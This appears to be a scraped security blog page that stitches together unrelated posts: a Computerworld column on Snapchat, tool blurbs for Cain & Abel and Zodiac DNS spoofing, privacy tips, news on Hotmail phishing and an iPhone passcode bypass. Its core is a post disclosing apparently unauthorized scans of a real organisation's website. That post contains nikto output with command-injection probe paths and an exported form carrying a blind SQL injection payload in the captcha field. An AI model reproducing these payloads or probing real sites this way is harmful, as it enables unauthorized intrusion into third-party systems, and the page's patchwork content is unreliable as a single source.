Snap Chat Vulnerabilities

Snapchat’s latest feature shows why IT must tame marketing’s inner monster

By Evan Schuman, Computerworld |  Mobile & Wireless, Marketing, Snapchat

Add a comment

May 06, 2014, 2:23 PM — Marketing has gone gaga over social media. (Come to think of it, gaga may be marketing’s default state.) Marketers being who they are, they are trying to figure out ways to use social media to control consumers and bend them to their will. As they seek to do that, they will look to IT to make their visions reality. It’s up to the adults in IT to inject some rationality into those discussions.

What brings this to mind is an interesting and deliriously over-the-top feature announced by Snapchat on May 1 and called simply Here. The intent of the program is innocuous enough. It’s supposed to allow people to pop up on your mobile screen without the phone ringing and — here’s the tricky part — without you agreeing to it. If you have ever seen marketers in action, you can probably see why I think this will appeal to them.

The video that Snapchat made shows how the program would work when everything goes perfectly. And it indeed looks like an attractive feature if you buy into Snapchat’s assumptions about how people should interact. As a Business Insider piece described it: “It’s all part of Snapchat’s strategy called ‘Here,’ which strives to make all users feel like their friends are constantly present and attentive.”

• 7 things marketing wants to say to IT

The catch is that friends — especially the rather all-encompassing definition of friends adopted by users of Snapchat and other social media — are in fact not constantly present and attentive. What better way to drive that point home than to force people to make a binary choice: interact with me now or not at all?

Snapchat differentiated its original photo-messaging service with its Mission: Impossible twist: Photos and videos vanished 10 seconds after they were viewed by the recipient. The Here Feature introduces social risks, though. With the original service, you sent an image, and if it was ignored, no one was insulted. But the more personal and real-time the conversation attempt, the more insulting it will feel when it’s ignored or rejected. Bizarrely enough, this is why email is arguably the most polite of communication methods. You can send an email whenever it suits you, and it quietly and politely waits until the recipient has the time to deal with it. With Here, you show up on the recipient’s screen instantly, and the recipient is either going to start to talk to you right then or just swipe you away into non-existence. Ouch!

Here’s the IT headache. This is going to plant ideas into the heads of your marketing counterparts. “Gee, I’d love to be able to pop up on the screens of our customers whenever I want. Make that happen, IT. Of course you can do it. Snapchat’s already done it.” (As a grown-up, you will want to resist the urge to respond, “And if Facebook jumped off the Empire State Building . . . ?”)

Most people have a bit of niceness and politeness inside of them. It’s socialized into us as we learn to avoid being rejected a lot. Marketers, though, seem to have no fear of rejection. Only they could routinely send out hundreds of thousands of emails and be thrilled with a 1% response rate. The prospect of being turned down again and again via an instant video-communication app is not going to faze them.

This is why, when I heard about Here, I thought about how dangerous it could be in the hands of the marketing department. People who have no compunction about telephoning millions of people during the dinner hour are not going to resist a technology that will let them instantly show up on the phones of customers, even though those customers might get annoyed if they are driving, going to the bathroom or just watching TV. If their conscience won’t stop them, you need to. Sorry, but there’s a price for having grown up.

Evan Schuman has covered IT issues for a lot longer than he’ll ever admit. The founding editor of retail technology site StorefrontBacktalk, he’s been a columnist for CBSNews.com, RetailWeek and eWeek. Evan can be reached at eschuman@thecontentfirm.com and he can be followed at twitter.com/eschuman. Look for his column every Tuesday.

Read more about bring your own device (byod) in Computerworld’s Bring Your Own Device (BYOD) Topic Center.

ITworld Today Newsletter

Originally published on Computerworld |  Click here to read the original story.

Vulnerability found in http://nnc.co.uk

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

Index.php Header contains a expireiry date that has long been and gone:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<meta http-equiv=”content-language” content=”en” />
var url_address = “http://ncc.co.uk/&#8221;;

Blindsqli in captcha!

During a few scans with backtrack, heres a vulnerability I found it their site, This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″>
<title>Exported HTTP Request from W3AF</title>
</head>
<body><form action=”http://ncc.co.uk/index.php” method=”POST”>
<label>
website</label>
<input type=”text” name=”website” value=”http://w3af.sf.net/”>
<label>comment</label>
<input type=”text” name=”comment” value=”Hi hunny I’m home”>
<label>firstname</label>
<input type=”text” name=”firstname” value=”John”>
<label>lastname</label>
<input type=”text” name=”lastname” value=”Smith”>
<label>company</label>
<input type=”text” name=”company” value=”Bonsai”>
<label>telephone</label>
<input type=”text” name=”telephone” value=”55550178″>
<label>captcha</label>
<input type=”text” name=”captcha” value=”84″ OR “84”=”84″>
<label>postcode</label>
<input type=”text” name=”postcode” value=”55550178″>
<label>address</label>
<input type=”text” name=”address” value=”Bonsai Street 123″>
<label>Accreditation_4_action</label>
<input type=”text” name=”Accreditation_4_action” value=”submit”>
<label>form</label>
<input type=”text” name=”form” value=”4″>
<label>title</label>
<input type=”text” name=”title” value=””>
<label>jobtitle</label>
<input type=”text” name=”jobtitle” value=”Hunter”>
<label>email</label>
<input type=”text” name=”email” value=”w3af@techsupportbase.net”>
<label>mode</label>
<input type=”text” name=”mode” value=”56″>
<label>captcha_token</label>
<input type=”text” name=”captcha_token” value=”4e49734857717649364c72367738453d“>
<label>page</label>
<input type=”text” name=”page” value=”689″>
<input type=”submit”>
</form>
</body>
</html>

19 Items found, to be suspected vulnerabilities

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
– Nikto v2.1.5
—————————————————————————
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
—————————————————————————
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string ‘admin:aaLR8vE.jjhss:root@127.0.0.1’, password file location ‘ans_data/ans.passwd’
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
—————————————————————————
+ 1 host(s) tested

Cain & Abel v4.9.35 – Password Sniffer, Cracker and Brute-Forcing Tool

It’s been quite a while since we’ve written about Cain & Abel, one of the most powerful tools for the Windows platform.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.

Most recently added is the support for Windows 2008 Terminal Server in APR-RDP sniffer filter.

You can download Cain & Abel v4.9.35 here:

ca_setup.exe

Or read more here, the online user manual is here.

Internet Security

You will be trading a bit of convenience for your increase in privacy. How many steps you take, and on which occasion you take them will depend on your degree of trust 🙂

1. cookies – by disabling persistent cookies, you can prevent a website (or network of websites) to track your browsing pattern across multiple sessions. Each time you close your browser, any cookies you have received will be deleted. The main drawback is that this will disable any website auto-logins or specific settings you may have enabled.

2. toolbars – assistants, helpers and other gimmicks that you might want to install as a browser toolbar will periodically phone home while you are surfing the web. Some of this may be legit, some of it may not.

3. websites that you register for – Social networking sites or webmail services may be interested in following your activities while you browse their site. Which topics interest you, what opinions did you express, did you make any purchases?
4. geolocation of your ip address – great for targeted advertising, or to display varied content (e.g. languages) depending on a user’s location. You could consider using a proxy that does not relay your original ip address.

5. data harvesting at the ISP level – search for Phorm, Nebuad, Carnivore 😉

The list could go on for a while, many others can comment on the other breeches of security like… Flash cookies, user agents, hopcounts, private browsing, browser anti-phishing features, omnibox, anonymizers, hosts file anyone?

Watch your password!

Microsoft confirmed yesterday evening that the popular web email service, Hotmail, had been targeted by malicious fraudsters in what is commonly referred to as a phishing scam, tricking users into revealing their credentials at fake websites.
Neowin can today reveal that more lists are circulating with genuine account information and that over 20,000 accounts have now been compromised. Non-Hotmail passport accounts have been affected too. A new list contains email accounts for Gmail, Yahoo, Comcast, Earthlink and other third party popular web mail services. It’s not clear if this is login information for the service itself or the Microsoft Passport passwords.
Microsoft confirmed Neowin’s exclusive report yesterday evening and issued a statement on a company blog:
“Over the weekend Microsoft learned that several thousand Windows Live Hotmail customer’s credentials were exposed on a third-party site due to a likely phishing scheme. Upon learning of the issue, we immediately requested that the credentials be removed and launched an investigation to determine the impact to customers. As part of that investigation, we determined that this was not a breach of internal Microsoft data and initiated our standard process of working to help customers regain control of their accounts.”
It’s clear the lists are the result of a phishing scam and some commenters at Neowin suggest it could be the result of unwitting users sending their credentials to sites that name who has blocked you on popular instant messaging software Windows Live Messenger.
Neowin has once again reported the new lists to Microsoft’s Security Response Center and can confirm that the lists originated from pastebin.com, a site commonly used by developers to share code snippets. Pastebin owner Paul Dixon confirmed that the site was down for maintenance due to “an unprecedented amount of traffic” after our initial reports. Dixon stated “Pastebin.com is just a fun side project for me, and today it’s not fun. It will remain offline all day while I make some further modifications.”
Update: The phishing attack has spread to Google Mail and Yahoo mail amongst others, we’re currently awaiting full confirmation on the number of accounts at each service. BBC News is reporting that Google have confirmed the phishing attack.

Phone Password Flaw Discovered

The Apple iPhone password that’s used to protect personal information can be easily circumvented, according to users.

Circumventing the password involves the use of the device’s "emergency call" keypad and amounts to only a couple of taps on the iPhone’s multitouch screen, according to reports of the flaw on the forum of the MacRumors Web site.

Once the emergency call keypad is accessed through the passcode entry screen, a person only needs to double tap the home button, which takes the user to the iPhone’s favorites section. From there, a person gets full access to the device, including applications, contact lists, and e-mail.

The apparent flaw, however, has a simple fix. Through the iPhone’s "settings" option, a person only has to disable double tapping on the home button to make the device secure once again, users reported.

Apple did not respond to a request for comment.

IPhone security is a key issue in use of the device on corporate networks. Getting businesses to adopt the iPhone was a major focus in Apple’s release of version 2.0 of the iPhone operating system over the summer. Find out what 2,000 IT professionals told InformationWeek about their plans and priorities for securing their companies’ assets. Download the report here (registration required).

Nevertheless, security issues have arisen with use of the iPhone. InformationWeek, for example, reported potential security problems in using Apple’s tools for creating custom configuration files that can be used to provision large numbers of iPhones on an enterprise environment.

In addition, the iPhone Mail and Safari applications in July were found to be vulnerable to URL spoofing. Security researcher Aviv Raff reported the problem and recommended that users not click on links to get to trusted sites, like online banks; but rather type URLs in manually until the problem is resolved.

Raff has criticized Apple for its handling of Safari security, saying the company has failed to learn from past browser design mistakes.

Zodiac Spoofing

 

Zodiac is a DNS protocol analyzation and exploitation program. It is a robust tool to explore the DNS protocol. Internally it contains advanced DNS routines for DNS packet construction and disassembling and is the optimal tool if you just want to try something out without undergoing the hassle to rewrite DNS packet routines or packet filtering.

Features

• sniffing on all kinds of configured devices (Ethernet, PPP, …)
• capturing and decoding nearly all types of DNS packets, including packet decompression
• nurses driven text based frontend with interactive commanding and multiple windows
• threaded design allow more flexibility when adding your own features
• clean code, commented and tested just fine, ready for you to extend
• internal DNS packet filtering allows installation of pseudo DNS filters you can “select()” on a large set of DNS packet construction primitives
• DNS name server visioning using BIND version requests
• DNS local spoofing, answering DNS queries on your LAN before the remote NS
• DNS jazz spoofing, exploiting a weakness within old BIND versions
• DNS ID spoofing, exploiting a weakness within the DNS protocol itself

You can download Zodiac 0.4.9 here:

zodiac-0.4.9.tar.gaze

Or read more here.

Leave a Reply

Hot Safety solutions

Hi people, how’s everyone doing? well I’ve been a bit busy and a few people wanted help with problems like "how do I get rid of this Virus? or check for Bugs? Well we can do with out the small talk and expand our minds to more important things in computer life! But you just need to remember to keep up with checks and hold the appropriate software on your system, like Avast and Ccleaner also a good antiSpyware like SypBot but it is great to have these on-line too, Error Doctor and AdaWareBot. Also please look in to updates of viruses and trogons see what feeds are available (these will save you time) and check your Registry for these, because there is always a possibility for infection even on a Flash Drive! You can schedule scans in these programs, on your computer to make it as easy as possible to keep your system CLEAN.